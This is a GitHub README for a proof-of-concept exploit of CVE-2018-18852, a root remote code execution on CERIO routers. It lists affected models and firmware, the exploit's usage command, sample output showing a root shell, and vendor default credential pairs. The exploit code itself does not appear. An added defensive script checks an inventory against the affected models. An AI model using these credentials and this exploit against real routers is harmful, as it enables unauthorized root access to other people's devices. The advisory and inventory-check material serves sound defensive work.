hook-s3c / Cve 2018 18852

Licence: gpl-3.0
CERIO RCE CVE-2018-18852, authenticated (vendor defaults) web-based RCE as root user.

CERIO router Authenticated RCE (backdoor vendor creds) CVE-2018-18852 Python PoC

hook-s3c (github.com/hook-s3c), @hook_s3c on twitter

Working Python PoC for CVE-2018-18852, originally published at https://github.com/hook-s3c/CVE-2018-18852

What's up

CERIO router models DT300N, DT100G, AMR-3204 and WMR-200N, and their variants, are vulnerable to an authenticated web-based RCE as the root user.

It is listed as an undisclosed 0day advisory: https://www.fortiguard.com/zeroday/FG-VD-18-149

Vendor default credentials are usually present, so execution is trivial.

Architecture is MIPS.

Usage and example

Usage: exploit.py <ipaddress> <port> <creds>
$ python ./exploit.py 127.0.0.1 8080 admin:admin

[*] ================================================
[*] CERIO RCE CVE-2018-18852, confirmed on;
[*] - CERIO DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3
[*] - CERIO DT-300N       - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7
[*] - CERIO DT-100G-N     - fw: Cen-AP-N2H10A V1.0.8
[*] - CERIO DT-100G       - fw: Cen-WR-G2H5 V1.0.7
[*] - CERIO DT-100GX-N    - fw: Cen-AP-N2H8A V1.0.18
[*] - CERIO AMR-3204G     - fw: Cen-AC V2.0.19
[*] - CERIO WMR-200N      - fw: Cen-HS-N2H1 V1.0.6c Test
[*]
[/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852
[/] Greetz to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, 
[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
[/] Go cop YTCracker's Introducing Neals, gov overreach is no joke - wake the fuck up
[*] ================================================

[email protected]:~# id
[!] This may not be the right model (DT-300N-NGS-M), trying again
[+] Sucessfully grabbed pid token: 1312


uid=0(root) gid=0(root)

[email protected]:~# 

Default cred combos;

  • operator:1234
  • admin:admin
  • root:default
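
For defenders, an added example (not part of the PoC or the author's repository) that checks an asset inventory against the models and firmware builds this README lists as confirmed. The inventory records, host names, the "V9.9.9" firmware string and the result labels are constructed for illustration.

```python
import re

# Confirmed-affected lines copied from the PoC banner shown on this page.
BANNER = """\
[*] - CERIO DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3
[*] - CERIO DT-300N       - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7
[*] - CERIO DT-100G-N     - fw: Cen-AP-N2H10A V1.0.8
[*] - CERIO DT-100G       - fw: Cen-WR-G2H5 V1.0.7
[*] - CERIO DT-100GX-N    - fw: Cen-AP-N2H8A V1.0.18
[*] - CERIO AMR-3204G     - fw: Cen-AC V2.0.19
[*] - CERIO WMR-200N      - fw: Cen-HS-N2H1 V1.0.6c Test
"""
# Model families named in the README text ("models and variants of").
FAMILIES = ("DT300N", "DT100G", "AMR3204", "WMR200N")

def norm(s):
    """Uppercase and keep only letters, digits and dots, so 'DT-300N' == 'dt300n'."""
    return re.sub(r"[^A-Z0-9.]", "", s.upper())

def parse_banner(text):
    """Return {normalized model: {normalized firmware, ...}} from the banner lines."""
    table = {}
    for m in re.finditer(r"CERIO\s+(\S+)\s+-\s+fw:\s*(.+)", text):
        table[norm(m.group(1))] = {norm(f) for f in m.group(2).split(",")}
    return table

CONFIRMED = parse_banner(BANNER)

def classify(model, firmware):
    """'confirmed': exact model+firmware listed; 'suspect': listed model or family variant."""
    m = re.sub(r"^CERIO", "", norm(model))   # tolerate a vendor prefix in the inventory
    f = norm(firmware)
    if f in CONFIRMED.get(m, ()):
        return "confirmed"
    if m in CONFIRMED or any(m.startswith(fam) for fam in FAMILIES):
        return "suspect"
    return "not-listed"

INVENTORY = [  # constructed sample records: (host, model, firmware)
    ("ap-lobby", "CERIO DT-300N", "Cen-CPE-N2H10A V1.1.7"),
    ("ap-lab", "dt300n", "Cen-CPE-N2H10A V9.9.9"),
    ("gw-branch", "AMR-3204", "unknown"),
    ("sw-core", "ExampleVendor X1", "1.0"),
]

def audit(inventory):
    return {host: classify(model, fw) for host, model, fw in inventory}

if __name__ == "__main__":
    print(audit(INVENTORY))
```

Devices reported as "confirmed" or "suspect" are the ones to check for the default accounts listed above.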

Greetz

Shoutout to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee

Go cop YTCracker's Introducing Neals, gov overreach is no joke - wake the fuck up

HTP!!!! YEET
